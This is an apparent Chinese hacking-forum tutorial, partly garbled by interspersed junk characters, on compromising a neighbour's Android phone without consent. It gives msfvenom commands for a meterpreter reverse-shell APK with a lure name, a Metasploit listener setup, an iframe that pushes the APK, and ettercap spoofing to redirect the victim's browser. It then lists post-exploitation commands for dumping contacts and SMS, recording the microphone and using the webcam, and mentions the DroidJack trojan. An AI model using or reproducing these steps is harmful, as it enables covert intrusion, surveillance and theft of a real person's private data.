|
2 H% P2 b$ ~5 k
五、msf+ettercap入侵邻居安卓手机 9 ^ e( e# k# v3 Y
: a3 G* y U" C1 R& }- q8 _
w, ]1 W3 a9 ^
首先启动msf $ v1 k' h# P* u
# G* b( l9 ]6 F$ v& i
$ [- r* }* y4 d e* h8 o 先用kali生成一个安卓木马,如下命令:
& Y& ?4 a3 t; Z) f r! h' @" g " s* L5 N2 R/ @, R4 A9 F- d
! _' C, g7 @# t8 c- p% g N8 d2 ~
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : {, x/ o. M( R' `
- A% H8 Y5 l9 V' W
1 F; N& L+ G! ^% K
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 & N0 L8 ?3 A: p6 ^9 r
9 w9 e4 v) ]3 f y$ `2 r% u3 U8 V# a# v6 B6 P6 `
然后进入msf 0 B8 D* q# E( r' }: h J
" O$ z2 D J2 W8 ]
; X5 i0 e1 S' x7 |2 j3 y+ S3 Y {
use exploit/multi/handler ) }$ J/ \+ Z" O+ k
~% {9 p% z( i# E
9 \) W' W4 T5 t
set payload android/meterpreter/reverse_tcp
4 U5 ~; c. K# }9 F
y7 \0 p8 u6 m/ L# I# G5 [5 x- ?% s% c3 t- _
set LHOST 192.168.0.109 //ip为kaili的ip / J( E* ? W; G+ D9 v3 P
1 A- G; x, x9 e0 m
J- p8 s z4 G3 u set LPORT 44444 //端口一定要与前面生成的木马的端口一致
1 C7 o- Y' p( V0 H) \ S ; X1 P& K7 `# [4 Z+ T( \# ?
! f; o7 p3 m% R- c% ^2 m Exploit
6 x2 R7 E+ T% a0 D G8 _% i4 g! y
) a4 c6 `7 G! \1 n, s& g. J8 q 2 U8 R8 t% x7 Q0 \
) b7 [5 S' v, z s* U1 V; F
$ v. H& G; O# ?: r6 q
下面我们开启ettercap -G 2 |% D& k+ v7 @
9 K/ S, e B E1 c; k( m0 E8 w
我物理IP为
, k# |# ~/ R( U) F
; Y7 ` d, a' |4 h& {; v# w& ~' Y- p% V! ]& ^5 |5 ]% L
. `2 f! d) _3 A% b8 c
4 n- p' p# J0 A7 Z) z6 ^9 i$ M8 _1 D5 O
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
4 P l+ d1 \. T9 w, K
" M: O+ o7 j: c) d
* s2 B& H% M; X# I 下面我们来设置一下 3 S3 u7 n5 z9 M6 w3 J
& h6 q' I$ M: T. i2 {; w- l
! u3 d$ j: M) I; q9 a
) Q& X" G8 W+ M' W
/ C0 q/ a) a" b% J1 f6 q8 s
2 S3 u9 U7 w% y, r+ K6 y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! W3 L' P3 K8 \1 y) h! j
$ ? S4 V# C) p! {% v& m: y' x( T! q# t. b0 S
# E- b6 D9 d% V" q! j0 d0 U% Z
5 q& X! b: C) _: T. w% |! I
( s) W; y+ @" ]- ` 8 x( v# o& R6 z0 k) B
2 B% P. `% k4 r" T5 W6 C( N& J
6 e% B E' L) b }9 c9 [7 p8 C # Q4 `* I, g& _# f- J' H
5 g6 g2 ^) `4 J/ Z
: X1 J6 }' H2 G8 B6 Y/ u# L/ ]
& i: K$ y7 ~$ D4 `7 `6 D
) \( |$ | D7 j) l# p
. _) }# h B$ Q8 K- O9 B- ~ 7 Z% Y: f( w( t2 Q
9 J0 @6 j% D Z" _6 e
* f$ i7 `, ]# H1 x$ m: i' G
$ Y ]0 R! L( N4 ^9 A6 I% a
, _. ?! `* n' x4 u7 A8 J0 l
" ]5 u6 v! a3 W) ^& t I8 j " V( Q, t% J& L% b+ N) \
- |* T/ i: Z) [3 p1 T8 c- I0 Y0 U
& v, e- S% {8 ?& ]4 h
. A# }6 S/ H% ~
, [6 }4 n; M3 S
) a* r, t% A+ m& J+ {
- _* S4 q/ Y) X: p* L, g* s, X; g
4 i! z$ U# R3 n
; J# r4 S. K' C9 D$ j- ~$ L; f
5 l3 ] L9 C5 h8 t$ z
5 s& [1 S8 d! z6 F9 }# p
2 [6 J t, T+ `) {0 r
* K* ^( l- [. D- k' `. q! l7 z2 I6 `" d W( e8 }
- D% g" D% A# D v+ f7 b$ C
0 `! ^: P" G2 p6 d* R' U' e( P- Y) T3 o1 J0 p$ ^
5 m# ]4 J4 w( } & P* _3 q. c9 L9 r7 K
9 I# f/ K1 x0 i* R v7 d8 H1 P 下面我们开始攻击 ( X% u6 |% f4 ]4 ~, K, \" ?
9 P7 J0 T4 s- V5 Z$ w
# N) A" ^3 x+ g5 J, `2 `- v
' }) E& | j/ @ s0 i' `/ s
$ R2 H% O4 w9 [3 s3 \! O) R7 P! `
# u. N x7 q' `: H' @7 M 5 E' c" \9 n, z
1 w; d2 W7 r7 F' D% n# p8 f/ P2 _7 s J9 ~" ?! t& J9 S
/ X# n, n" W- M7 M5 k* R8 @: S 6 l* E0 X9 r5 b! }' i8 e
) X3 A3 z4 }4 S+ I# E/ b( _1 B
7 V7 ~0 U" p: Y+ ]* h2 R$ q
& Q6 [. {( a7 g# B& ^$ T$ n5 z
& H! h$ |, x% H% U( Y; m" j" b; N9 f 6 L9 K- f: i! _) r) {4 t
, Y9 l2 z8 ?/ A1 ~$ R1 |+ g5 W& [! N
大概过了5分钟多,发现反弹成功了
5 I/ C8 _0 j+ J9 u* c ' ?/ B; B- w* G* R/ V8 g
+ v9 U& d' \# K) M& j3 @( {) r
& v/ T' `* Y z
% i: U+ w* f1 @* W3 J1 C! H
9 e z' w8 G0 P; i
f7 |* ~' n* V' k 7 @- J8 J$ W; m+ ^8 ]
/ `0 ?& u) y! D$ J& y0 ^- J& O
% Q$ b8 y; Z& g4 g7 A" D" v& m
) V% ]9 i6 m5 y$ e+ l' O# h, S
; o1 x+ t: h( Y8 }2 E* V0 Y% W 1 O- i; T/ E# V
: G+ B3 `! ~$ N3 R: L0 a& \ T% Q: B; J, k% u& n/ I' b% @% `: G) Q- P
: |3 t. ~ x2 d/ m! C; \8 | . p$ b+ ]) f# h( j/ D+ r
. y7 l+ t' ~1 R+ }% f
" e' g% X# \; j9 U7 n
# l4 G, @; _5 X: r! \( G$ P; r8 }
9 e+ c; f' q* q6 e9 U5 W4 n1 W' ~ & _ A! v5 b! q' ~" }! O
; k1 K7 o f/ g- }3 X& ]7 l8 ?
7 H8 y5 e' D* E V5 E; |
执行命令
, C% ^$ V# w0 g5 A5 t 2 J. v4 C' |& t! W1 Q7 j' h+ Y" B
: s3 p5 U! u" v2 A
' b2 I0 q4 p, d 5 P. k/ L+ T' f8 W9 I# S8 p7 v, ~ t
" X* n0 }4 V9 L. p+ g# k dump_contacts --》这个是导出电话
( s d. D! S# J4 W u) E ' M' N) k9 q& h% l$ G
% @* i0 N1 Q' @2 R
dump_sms --》这个是导出信息
7 Q. O' m3 ?" K* p) D( M- D
v& X" d3 ]' T. F; a/ j. f# B) @8 K9 a) L3 y) b
record_mic Record audio from the default microphone for X seconds 6 r2 K+ w! _* g/ ]0 Y) V
- j" x1 o7 S. S/ _
& q3 _7 S. ^1 Y. x
webcam_chat Start a video chat
. L6 R6 y& b& k9 ? / t- }2 ?1 `" [% |2 B* S, O
) W* B' c) |4 ?. U+ W
webcam_list List webcams
( Q+ d0 \4 C. J! j* @9 y- J / H: b& a8 S' J
3 g( J% K; q+ _' R
webcam_snap Take a snapshot from the specified webcam - g* l0 F) `5 X* F' m9 A" d
' B9 e( l. E; F: N' X) b4 C. u& _
; K4 t: K. F) J+ H- ]# k4 z- y, N
webcam_stream   lay a video stream from the specified webcam # J0 [1 w- m: j+ y7 q
% p) [$ A7 r% U* K8 B
" d* h7 A$ F7 ]& M+ q
# f* y: {0 j& W ! i$ O* P6 D; i3 J6 C' H% ` U, [1 W+ `
4 E& {! z( F, |: \
) B% a. n* Q4 P: B: y1 T
: Q% N4 X) _5 z3 x1 y9 j, Q* y' [/ x; l8 L! W {
我们打开看一下电话薄,
/ v, r5 w$ i5 K" U. e, @7 D - I1 |. N' i$ h8 \9 i- v- d
% v) |) [: N6 L1 q- ?
9 z$ n6 R* L" t. z5 t. n 6 h& F; P& N$ l) L) n! W4 d5 ~
6 z8 l1 d8 S u
% V2 R7 j" P, ?$ A
: U9 X: o* l* w. U5 C
. `9 ]! T$ F, s* Q
3 u; k2 @# b! f" W$ R ) S3 @& j. }. f7 j3 i6 L
% f# M# {, S5 Z6 ?* G! \# ?
6 d0 m3 o; x1 y9 x
5 }' f$ s( J( U @3 t; l, j$ a
7 \6 ^6 b' f# n; n
, ?7 s( m& N8 {$ W& ?1 J7 ]
. Z! n7 }/ `8 E: _/ I8 E& N* W) P/ r' h
& g. ^# ~% r' t
8 H" e8 U0 j$ U- v& N( C
/ g7 x% y8 x7 w. j 我们同时欺骗成DroidJack木马,使用方法如图:
7 R7 ^1 U1 e* O7 B7 x$ g
' V; @, ?# L6 D/ H/ {' a5 E) P6 P5 Y9 M9 F5 H
. i4 ~+ E6 K$ o) m+ |" A
: Y0 b6 @( {& \
: k9 F$ J' ]* }) H. {# j5 Y3 u / @6 c0 a) y' Z& w+ {" L
; N& R: S2 o( E+ n" m2 O$ Q2 b
l8 D6 r) ? H* A
( S3 i0 G: p6 V3 o
& ?5 `9 w" d4 Y$ _
4 p N, r/ @/ z; D$ o1 H) b& t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
+ _% ]8 k+ z" C3 y0 o" Q' N
: B5 z3 }9 ~+ y7 t! v. O8 V
2 E; J" h8 q; j7 J: r
! f; T& J8 X* p; b0 N7 s 0 W. R; V' @0 `5 n
! h# }8 ?( E& A; U, s X
7 |! {0 d2 W* G" p1 D4 f1 X3 y9 J
0 J/ X: u$ s) x! g {; H; I8 Z! ~% ]( M1 S! B$ v% m5 P% l% y
" X8 r6 H% u* P& @, u
, j1 T* e3 E2 X" f# a
+ a- a Q5 \% Y6 S1 @2 A u- [- C
 + ]* m8 ?8 ^$ i; e
1 z4 N4 ]/ f `) j5 b
! z7 z: c, ^; k5 d, E+ d: T* D8 H9 }
' f& M4 r6 |) A0 t0 S, W
|